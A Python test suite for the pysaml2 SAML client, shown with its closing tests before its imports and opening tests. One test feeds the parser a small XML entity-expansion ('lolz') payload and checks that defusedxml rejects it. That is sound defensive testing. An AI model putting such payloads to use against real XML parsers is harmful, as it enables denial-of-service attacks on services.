'recipient': "http://lingon.catalogix.se:8087/",
'in_response_to': "_012345",
'subject_confirmation_method': saml.SCM_BEARER
}
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
name_id=name_id,
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion'])
a_asser = Assertion({"uid": "test01", "email": "<EMAIL>"})
a_assertion = a_asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion.signature = sigver.pre_signature_part(
a_assertion.id, _sec.my_cert, 1)
assertion.advice = Advice()
assertion.advice.encrypted_assertion = []
assertion.advice.encrypted_assertion.append(EncryptedAssertion())
assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion.append(assertion)
response = _sec.sign_statement("%s" % response, class_name(a_assertion),
key_file=self.client.sec.key_file,
node_id=a_assertion.id)
# xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
# xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'sn': ['Jeter'], 'givenName': ['Derek'], 'uid': ['test01'],
'email': ['<EMAIL>']}
def test_sign_then_encrypt_assertion_advice_2(self):
        # Begin with the IdP's side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser_1 = Assertion({"givenName": "Derek"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
assertion_1 = asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
asser_2 = Assertion({"sn": "Jeter"})
assertion_2 = asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_1 = Assertion({"uid": "test01"})
a_assertion_1 = a_asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_2 = Assertion({"email": "<EMAIL>"})
a_assertion_2 = a_asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_3 = Assertion({"street": "street"})
a_assertion_3 = a_asser_3.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_4 = Assertion({"title": "title"})
a_assertion_4 = a_asser_4.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion_1.signature = sigver.pre_signature_part(
a_assertion_1.id, _sec.my_cert, 1)
a_assertion_2.signature = sigver.pre_signature_part(
a_assertion_2.id, _sec.my_cert, 1)
a_assertion_3.signature = sigver.pre_signature_part(
a_assertion_3.id, _sec.my_cert, 1)
a_assertion_4.signature = sigver.pre_signature_part(
a_assertion_4.id, _sec.my_cert, 1)
assertion_1.signature = sigver.pre_signature_part(assertion_1.id,
_sec.my_cert, 1)
assertion_2.signature = sigver.pre_signature_part(assertion_2.id,
_sec.my_cert, 1)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion = assertion_1
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_1)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_1._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_1),
key_file=self.server.sec.key_file,
node_id=a_assertion_1.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_2)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_2._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_2),
key_file=self.server.sec.key_file,
node_id=a_assertion_2.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
assertion_tag = response.assertion._to_element_tree().tag
response = pre_encrypt_assertion(response)
response = \
response.get_xml_string_with_self_contained_assertion_within_encrypted_assertion(
assertion_tag)
response = _sec.sign_statement("%s" % response, class_name(assertion_1),
key_file=self.server.sec.key_file,
node_id=assertion_1.id)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
response = samlp.response_from_string(enctext)
response.assertion = assertion_2
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_3)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_3._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_3),
key_file=self.server.sec.key_file,
node_id=a_assertion_3.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_4)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_4._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_4),
key_file=self.server.sec.key_file,
node_id=a_assertion_4.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response = _sec.sign_statement("%s" % response,
class_name(response.assertion[0]),
key_file=self.server.sec.key_file,
node_id=response.assertion[0].id)
response = samlp.response_from_string(response)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(str(response).encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'street': ['street'], 'uid': ['test01'], 'title': ['title'],
'givenName': ['Derek'], 'email':
['<EMAIL>'], 'sn': ['Jeter']}
def test_signed_redirect(self):
        # Revert the configuration change above: disallow unsigned responses again
self.client.want_response_signed = True
msg_str = "%s" % self.client.create_authn_request(
"http://localhost:8088/sso", message_id="id1")[1]
info = self.client.apply_binding(
BINDING_HTTP_REDIRECT, msg_str, destination="",
relay_state="relay2", sigalg=SIG_RSA_SHA256)
loc = info["headers"][0][1]
qs = parse_qs(loc[1:])
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
self.client.sec.sec_backend)
res = self.server.parse_authn_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_signed_redirect(self):
conf = config.SPConfig()
conf.load_file("sp_slo_redirect_conf")
client = Saml2Client(conf)
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
client.users.add_information_about_person(session_info)
entity_ids = client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = client.do_logout(nid, entity_ids, "Tired", in_a_while(minutes=5),
sign=True,
expected_binding=BINDING_HTTP_REDIRECT)
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_REDIRECT
loc = info["headers"][0][1]
_, _, _, _, qs, _ = urlparse(loc)
qs = parse_qs(qs)
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
client.sec.sec_backend)
res = self.server.parse_logout_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_post(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
def test_do_logout_session_expired(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": a_while_ago(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
# Below can only be done with dummy Server
IDP = "urn:mace:example.com:saml:roland:idp"
class TestClientWithDummy():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.SPConfig()
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_do_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_negotiated_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = \
self.client.prepare_for_negotiated_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert binding == auth_binding
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_attribute_query(self):
response = self.client.do_attribute_query(
IDP, "_e7b68a04488f715cda642fbdd90099f5",
attribute={"eduPersonAffiliation": None},
nameid_format=NAMEID_FORMAT_TRANSIENT)
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
def test_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
        # Normally a response would now be sent back to the user's web client.
        # Here I fake what that client would do and create the form POST.
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
# Explicitly allow unsigned responses for this test
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
def test_negotiated_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = self.client.prepare_for_negotiated_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
assert binding == auth_binding
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
        # Normally a response would now be sent back to the user's web client.
        # Here I fake what that client would do and create the form POST.
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
class TestClientNoConfigContext():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.Config() # not SPConfig
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
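# defusedxml should reject documents that declare custom entities
# (XXE / entity-expansion protection) by raising EntitiesForbidden.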
def test_parse_soap_enveloped_saml_xxe():
xml = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
]>
<lolz>&lol1;</lolz>
"""
with raises(EntitiesForbidden):
parse_soap_enveloped_saml(xml, None)
if __name__ == "__main__":
tc = TestClient()
tc.setup_class()
tc.test_sign_then_encrypt_assertion()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import uuid
import six
from future.backports.urllib.parse import parse_qs
from future.backports.urllib.parse import urlencode
from future.backports.urllib.parse import urlparse
from pytest import raises
from saml2.argtree import add_path
from saml2.cert import OpenSSLWrapper
from saml2.xmldsig import SIG_RSA_SHA256
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from saml2 import config
from saml2 import class_name
from saml2 import extension_elements_to_elements
from saml2 import saml
from saml2 import samlp
from saml2 import sigver
from saml2 import s_utils
from saml2.assertion import Assertion
from saml2.extension.requested_attributes import RequestedAttributes
from saml2.extension.requested_attributes import RequestedAttribute
from saml2.authn_context import INTERNETPROTOCOLPASSWORD
from saml2.client import Saml2Client
from saml2.pack import parse_soap_enveloped_saml
from saml2.response import LogoutResponse
from saml2.saml import NAMEID_FORMAT_PERSISTENT, EncryptedAssertion, Advice
from saml2.saml import NAMEID_FORMAT_TRANSIENT
from saml2.saml import NameID
from saml2.samlp import SessionIndex
from saml2.server import Server
from saml2.sigver import pre_encryption_part, pre_encrypt_assertion
from saml2.sigver import rm_xmltag
from saml2.sigver import verify_redirect_signature
from saml2.s_utils import do_attribute_statement
from saml2.s_utils import factory
from saml2.time_util import in_a_while, a_while_ago
from defusedxml.common import EntitiesForbidden
from fakeIDP import FakeIDP
from fakeIDP import unpack_form
from pathutils import full_path
AUTHN = {
"class_ref": INTERNETPROTOCOLPASSWORD,
"authn_auth": "http://www.example.com/login"
}
encode_fn = getattr(base64, 'encodebytes', base64.encodestring)
def generate_cert():
sn = uuid.uuid4().urn
cert_info = {
"cn": "localhost",
"country_code": "se",
"state": "ac",
"city": "Umea",
"organization": "ITS",
"organization_unit": "DIRG"
}
osw = OpenSSLWrapper()
ca_cert_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.crt"))
ca_key_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.key"))
req_cert_str, req_key_str = osw.create_certificate(cert_info, request=True,
sn=sn, key_length=2048)
cert_str = osw.create_cert_signed_certificate(ca_cert_str, ca_key_str,
req_cert_str)
return cert_str, req_key_str
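# String-level helper that splices a serialized sub-element into an empty,
# self-closing element (e.g. <EncryptedAssertion/>) of an XML document string.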
def add_subelement(xmldoc, node_name, subelem):
s = xmldoc.find(node_name)
if s > 0:
x = xmldoc.rindex("<", 0, s)
tag = xmldoc[x + 1:s - 1]
c = s + len(node_name)
spaces = ""
while xmldoc[c] == " ":
spaces += " "
c += 1
# Sometimes we get an xml header, sometimes we don't.
subelem_str = str(subelem)
if subelem_str[0:5].lower() == '<?xml':
subelem_str = subelem_str.split("\n", 1)[1]
xmldoc = xmldoc.replace(
"<%s:%s%s/>" % (tag, node_name, spaces),
"<%s:%s%s>%s</%s:%s>" % (tag, node_name, spaces, subelem_str, tag,
node_name))
return xmldoc
def for_me(condition, me):
for restriction in condition.audience_restriction:
audience = restriction.audience
if audience.text.strip() == me:
return True
def ava(attribute_statement):
result = {}
for attribute in attribute_statement.attribute:
# Check name_format ??
name = attribute.name.strip()
result[name] = []
for value in attribute.attribute_value:
result[name].append(value.text.strip())
return result
def _leq(l1, l2):
return set(l1) == set(l2)
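# Reference AttributeQuery serializations, keyed by what appears to be a library
# version; they are not referenced by the tests below.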
REQ1 = {"1.2.14": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery Destination="https://idp.example.com/idp/" ID="id1"
IssueInstant="%s" Version="2.0" xmlns:ns0="urn:oasis:names:tc:SAML:2
.0:protocol"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:entity" xmlns:ns1="urn:oasis:names:tc:SAML:2
.0:assertion">urn:mace:example.com:saml:roland:sp</ns1:Issuer><ns1:Subject
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion"><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>""",
"1.2.16": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery xmlns:ns0="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion" Destination="https://idp
.example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0"><ns1:Issuer
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">urn:mace:example
.com:saml:roland:sp</ns1:Issuer><ns1:Subject><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>"""}
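# Transient NameID used as the test subject by the logout-related tests below.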
nid = NameID(name_qualifier="foo", format=NAMEID_FORMAT_TRANSIENT,
text="123456")
def list_values2simpletons(_dict):
return dict([(k, v[0]) for k, v in _dict.items()])
class TestClient:
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = Saml2Client(conf)
def teardown_class(self):
self.server.close()
def test_create_attribute_query1(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
reqstr = "%s" % req.to_string().decode()
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
issuer = req.issuer
assert issuer.text == "urn:mace:example.com:saml:roland:sp"
attrq = samlp.attribute_query_from_string(reqstr)
assert _leq(attrq.keyswv(), ['destination', 'subject', 'issue_instant',
'version', 'id', 'issuer'])
assert attrq.destination == req.destination
assert attrq.id == req.id
assert attrq.version == req.version
assert attrq.issuer.text == issuer.text
assert attrq.issue_instant == req.issue_instant
assert attrq.subject.name_id.format == name_id.format
assert attrq.subject.name_id.text == name_id.text
def test_create_attribute_query2(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
attribute={
("urn:oid:2.5.4.42",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"givenName"): None,
("urn:oid:2.5.4.4",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"surname"): None,
("urn:oid:1.2.840.113549.1.9.1",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"): None,
},
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
assert len(req.attribute) == 3
# one is givenName
seen = []
for attribute in req.attribute:
if attribute.name == "urn:oid:2.5.4.42":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "givenName"
seen.append("givenName")
elif attribute.name == "urn:oid:2.5.4.4":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "surname"
seen.append("surname")
elif attribute.name == "urn:oid:1.2.840.113549.1.9.1":
assert attribute.name_format == saml.NAME_FORMAT_URI
if getattr(attribute, "friendly_name"):
assert False
seen.append("email")
assert _leq(seen, ["givenName", "surname", "email"])
def test_create_attribute_query_3(self):
req_id, req = self.client.create_attribute_query(
"https://aai-demo-idp.switch.ch/idp/shibboleth",
"_e7b68a04488f715cda642fbdd90099f5",
format=saml.NAMEID_FORMAT_TRANSIENT,
message_id="id1")
assert isinstance(req, samlp.AttributeQuery)
assert req.destination == "https://aai-demo-idp.switch" \
".ch/idp/shibboleth"
assert req.id == "id1"
assert req.version == "2.0"
assert req.issue_instant
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
nameid = req.subject.name_id
assert nameid.format == saml.NAMEID_FORMAT_TRANSIENT
assert nameid.text == "_e7b68a04488f715cda642fbdd90099f5"
def test_create_auth_request_0(self):
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_TRANSIENT
node_requested_attributes = None
for e in ar.extensions.extension_elements:
if e.tag == RequestedAttributes.c_tag:
node_requested_attributes = e
break
assert node_requested_attributes is not None
for c in node_requested_attributes.children:
assert c.tag == RequestedAttribute.c_tag
assert c.attributes['isRequired'] in ['true', 'false']
assert c.attributes['Name']
assert c.attributes['FriendlyName']
assert c.attributes['NameFormat']
def test_create_auth_request_unset_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1")
assert bool(req.force_authn) == False
def test_create_auth_request_set_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1",
force_authn="true")
assert bool(req.force_authn) == True
def test_create_auth_request_nameid_policy_allow_create(self):
conf = config.SPConfig()
conf.load_file("sp_conf_nameidpolicy")
client = Saml2Client(conf)
ar_str = "%s" % client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
